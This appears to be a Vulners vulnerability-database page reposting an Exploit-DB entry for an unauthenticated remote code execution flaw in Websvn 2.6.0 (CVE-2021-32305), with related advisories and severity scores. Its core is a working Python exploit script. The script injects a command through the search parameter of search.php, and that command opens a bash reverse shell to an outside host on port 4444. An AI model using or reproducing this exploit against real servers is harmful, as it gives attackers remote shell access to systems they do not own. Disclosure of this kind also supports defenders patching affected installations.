Lucene search
K

Websvn 2.6.0 - Remote Code Execution (Unauthenticated)

🗓️ 21 Jun 2021 00:00:00Reported by g0ldm45kType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 519 Views

Remote code execution vulnerability in Websvn 2.6.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Websvn 2.6.0 - Remote Code Execution (Unauthenticated) Exploit
21 Jun 202100:00
zdt
GithubExploit
Exploit for CVE-2021-3205
26 Dec 202320:20
githubexploit
GithubExploit
Exploit for OS Command Injection in Websvn
26 Dec 202320:20
githubexploit
ATTACKERKB
CVE-2021-32305
18 May 202100:00
attackerkb
ArchLinux
[ASA-202105-16] websvn: arbitrary command execution
25 May 202100:00
archlinux
Circl
CVE-2021-32305
21 Jun 202100:00
circl
CNNVD
websvn 操作系统命令注入漏洞
18 May 202100:00
cnnvd
Check Point Advisories
WebSVN Remote Code Execution (CVE-2021-32305)
31 Aug 202100:00
checkpoint_advisories
CVE
CVE-2021-32305
18 May 202116:11
cve
Cvelist
CVE-2021-32305
18 May 202116:11
cvelist
Rows per page
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305

import requests
import argparse
from urllib.parse import quote_plus

PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'

parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")

args = parser.parse_args()

if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
else:
    print("[!] Target should start with either http:// or https://")
    exit()

requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))

print("[*] Request send. Did you get what you wanted?")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jun 2021 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
CVSS 210
EPSS0.92353
519